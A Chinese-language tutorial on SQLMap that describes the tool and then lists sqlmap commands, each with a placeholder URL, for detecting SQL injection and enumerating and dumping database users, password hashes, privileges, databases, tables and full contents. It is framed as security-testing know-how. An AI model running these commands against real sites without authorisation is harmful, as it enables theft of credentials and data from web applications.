前言
SQLMap 是一款用于自动化 SQL 注入检测与测试的开源工具,其主要功能是检测和利用 Web 应用程序中的 SQL 注入。以下是 SQLMap 的主要特点和功能:
自动化检测:SQLMap 可以自动发现 Web 应用程序中的 SQL 注入,包括基于 GET 和 POST 参数的注入点,以及 Cookie 和 HTTP 头部等。
支持多种数据库:SQLMap 支持检测和利用多种类型的数据库,包括 MySQL、Oracle、SQL Server、PostgreSQL 等。
综合测试:SQLMap 提供了丰富的测试选项,可以进行盲注、时间延迟注入、报错注入等多种测试方式,以验证注入的存在性和可利用性。
漏洞利用:SQLMap 能够利用发现的 SQL 注入执行各种操作,包括获取数据库中的数据、读取文件、执行系统命令等。
批量扫描:SQLMap 支持批量扫描,可以同时对多个目标进行检测和利用,提高效率。
细粒度控制:SQLMap 提供了丰富的命令行选项和配置参数,用户可以对扫描和利用过程进行细粒度的控制和定制。
报告生成:SQLMap 能够生成详细的扫描和利用报告,包括发现的、执行的操作和结果等信息,便于分析和整理。
总的来说,SQLMap 是一款功能强大的 SQL 注入工具,可帮助安全研究人员、测试人员和开发人员发现和修复 Web 应用程序中的 SQL 注入,从而提高应用程序的安全性。
一、探测指定URL是否存在SQL注入漏洞
1.1 GET
sqlmap -u "url"
第一处交互的地方是说这个目标系统的数据库好像是Mysql数据库,是否还探测其他类型的数据库
第二处交互的地方是说对于剩下的测试,问我们是否想要使用扩展提供的级别
第三处交互是说已经探测到参数id存在漏洞了,是否还探测其他地方
1.2 POST
sqlmap -u "url" --data=""
二、查看数据库的所有用户
sqlmap -u "url" --users
三、查看数据库所有用户名的密码
sqlmap -u "url" --passwords
四、查看数据库当前用户
sqlmap -u "url" --current-user
五、判断当前用户是否有管理权限
sqlmap -u "url" --is-dba
六、列出数据库管理员角色
sqlmap -u "url" --roles
七、查看所有的数据库
sqlmap -u "url" --dbs
八、查看当前的数据库
sqlmap -u "url" --current-db
九、爆出指定数据库中的所有的表
sqlmap -u "url" -D security --tables
十、爆出指定数据库指定表中的所有的列
sqlmap -u "url" -D security -T users --columns
十一、爆出指定数据库指定表指定列下的数据
sqlmap -u "url" -D security -T users -C username --dump
十二、爆出该网站数据库中的所有数据
sqlmap -u "url" --dump-all